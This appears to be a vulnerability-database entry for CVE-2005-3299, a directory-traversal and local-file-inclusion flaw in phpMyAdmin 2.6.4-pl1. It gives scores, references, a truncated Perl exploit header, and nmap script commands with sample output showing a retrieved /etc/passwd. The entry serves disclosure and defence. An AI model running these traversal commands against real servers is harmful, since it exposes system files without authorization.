Published: 23/10/2005 Updated: 05/09/2008

CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10

VMScore: 520

Vector: AV:N/AC:L/Au:N/C:N/I:P/A:N

PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote malicious users to include local files via the $__redirect parameter, possibly involving the subform array.

Vulnerable Product	Search on Vulmon	Subscribe to Product
phpmyadmin phpmyadmin 2.6.4
phpmyadmin phpmyadmin 2.6.4_pl1

Debian Bug report logs - #333433 phpmyadmin: Possible directory traversal vulnerability Package: phpmyadmin; Maintainer for phpmyadmin is Thijs Kinkhorst <thijs@debianorg>; Source for phpmyadmin is src:phpmyadmin (PTS, buildd, popcon) Reported by: Daniel Leidert <danielleidert@wgddde> Date: Tue, 11 Oct 2005 22:03: ...

#!/usr/bin/perl use IO::Socket; # SecurityReasoncom TEAM # Maksymilian Arciemowicz ( cXIb8O3 ) cxib@securtiyreasoncom # # Local file inclusion (/$FILE) # simple exploit phpMyAdmin 264-pl1 # # # SecurityReasoncom if (@ARGV < 3) { print "\r\n SecurityReason TEAM\r\n"; print "[cXIb8O3] EXPLOIT for phpMyAdmin 264-pl1\r\n"; print " \r\n"; p ...

Exploits a directory traversal vulnerability in phpMyAdmin 2.6.4-pl1 (and possibly other versions) to retrieve remote files on the web server.

nmap -p80 --script http-phpmyadmin-dir-traversal --script-args="dir='/pma/',file='../../../../../../../../etc/passwd',outfile='passwd.txt'" <host/ip>
nmap -p80 --script http-phpmyadmin-dir-traversal <host/ip>

PORT   STATE SERVICE
80/tcp open  http
| http-phpmyadmin-dir-traversal:
|   VULNERABLE:
|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2005-3299
|     Description:
|       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|
|     Disclosure date: 2005-10-nil
|     Extra information:
|       ../../../../../../../../etc/passwd :
|   root:x:0:0:root:/root:/bin/bash
|   daemon:x:1:1:daemon:/usr/sbin:/bin/sh
|   bin:x:2:2:bin:/bin:/bin/sh
|   sys:x:3:3:sys:/dev:/bin/sh
|   sync:x:4:65534:sync:/bin:/bin/sync
|   games:x:5:60:games:/usr/games:/bin/sh
|   man:x:6:12:man:/var/cache/man:/bin/sh
|   lp:x:7:7:lp:/var/spool/lpd:/bin/sh
|   mail:x:8:8:mail:/var/mail:/bin/sh
|   news:x:9:9:news:/var/spool/news:/bin/sh
|   uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
|   proxy:x:13:13:proxy:/bin:/bin/sh
|   www-data:x:33:33:www-data:/var/www:/bin/sh
|   backup:x:34:34:backup:/var/backups:/bin/sh
|   list:x:38:38:Mailing List Manager:/var/list:/bin/sh
|   irc:x:39:39:ircd:/var/run/ircd:/bin/sh
|   gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
|   nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
|   libuuid:x:100:101::/var/lib/libuuid:/bin/sh
|   syslog:x:101:103::/home/syslog:/bin/false
|   sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
|   dps:x:1000:1000:dps,,,:/home/dps:/bin/bash
|   vboxadd:x:999:1::/var/run/vboxadd:/bin/false
|   mysql:x:103:110:MySQL Server,,,:/nonexistent:/bin/false
|   memcache:x:104:112:Memcached,,,:/nonexistent:/bin/false
|   ../../../../../../../../etc/passwd saved to passwd.txt
|
|     References:
|       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_      http://www.exploit-db.com/exploits/1244/

NVD-CWE-Other http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-4 http://www.gentoo.org/security/en/glsa/glsa-200510-16.xml http://secunia.com/advisories/17137 http://www.securityfocus.com/bid/15053 http://securityreason.com/securityalert/69 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=333433 https://nvd.nist.gov https://www.exploit-db.com/exploits/1244/https://nmap.org/nsedoc/scripts/http-phpmyadmin-dir-traversal.html

CVE-2005-3299

Vulnerability Summary

Vulnerability Trend

Vendor Advisories

Exploits

Nmap Scripts

References

Vulmon Search

About

Products

Connect